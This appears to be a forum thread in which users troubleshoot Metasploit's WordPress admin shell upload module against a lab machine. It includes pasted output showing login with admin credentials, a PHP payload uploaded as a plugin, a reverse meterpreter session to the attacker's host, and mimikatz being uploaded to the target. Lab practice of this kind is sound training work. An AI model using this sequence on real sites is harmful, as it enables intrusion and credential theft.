On the part where I initiate wp_admin_shell_upload
A meterpreter shell is returned but things like cat or lcd are “unknown commands”
However commands that work return nothing. As if the output is being printed somewhere else. It only returns me to the meterpteter prompt.
Here is an image of what the issue looks like. I am in the meterpreter shell and the only commands that don’t err is channel and help.
Everything else is an unknown command.
Type your comment> @irealmar said:
Check here the meterpreter basic commands. Meterpreter shell is not like regular shell.
Please refer to my imgur link, I’ve demonstrated most of those commands do not work. Or return nothing.
What am I doing wrong?!
After I ‘set LHOST ’ under msf6>, it all worked for me. I am on msfconsole 6. It came with Parrot Linux.
Here’s my obfuscated – output
[*] Started reverse TCP handler on 10.10.14.--:4444
[*] Authenticating with WordPress using admin:P@s5w0rd!...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/ckurpJrGib/nlHLlldWhb.php...
[*] Sending stage (39282 bytes) to 10.10.10.29
[*] Meterpreter session 3 opened (10.10.14.--:4444 -> 10.10.10.29:50239) at 2021-02-24 05:56:18 +0000
[+] Deleted nlHLlldWhb.php
[+] Deleted ckurpJrGib.php
[!] This exploit may require manual cleanup of '../ckurpJrGib' on the target
meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
meterpreter > lcd /usr/share/mimikatz/Win32/
meterpreter > upload mimikatz.exe